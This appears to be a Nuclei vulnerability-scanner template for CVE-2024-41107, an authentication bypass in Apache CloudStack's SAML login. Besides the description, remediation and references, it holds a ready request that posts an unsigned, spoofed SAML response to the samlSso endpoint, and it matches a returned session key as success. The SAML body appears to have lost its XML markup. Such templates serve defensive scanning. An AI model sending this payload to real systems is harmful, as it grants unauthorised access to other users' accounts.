id: CVE-2024-41107 info: name: Apache CloudStack - SAML Signature Exclusion author: iamnoooob,rootxharsh,pdresearch severity: critical description: | The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account impact: | Unauthenticated attackers can bypass SAML authentication by submitting spoofed SAML responses without signatures. remediation: | Update Apache CloudStack to a version that enforces SAML signature validation. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-41107 - http://www.openwall.com/lists/oss-security/2024/07/19/1 - http://www.openwall.com/lists/oss-security/2024/07/19/2 - https://cloudstack.apache.org/blog/security-release-advisory-cve-2024-41107 - https://github.com/apache/cloudstack/issues/4519 classification: epss-score: 0.1776 epss-percentile: 0.96838 cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: app="APACHE-CloudStack" product: cloudstack vendor: apache tags: cve,cve2024,apache,cloudstack,auth-bypass,vuln variables: username: "{{username}}" entityid: "{{entityid}}" saml_id: "{{saml_id}}" saml: ' {{entityid}} {{entityid}} org.apache.cloudstack urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport {{username}} ' http: - raw: - | POST /client/api?command=samlSso HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded RelayState=undefined&SAMLResponse={{urlencode(base64(saml))}} matchers-condition: and matchers: - type: dsl dsl: - "contains(header,'sessionkey')" - "contains(content_type,'text/xml')" - "status_code==302" condition: and # digest: 490a0046304402205681ad7fb3b726ae93c4078f1d0c9d3f86df69d8fe9de3c7af0aa3ce51dac7370220309b1e7b16387f8ba6ea4b65869adcbde771d793d7614a93a60bc75f45439f89:922c64590222798bb761d5b6d8e72950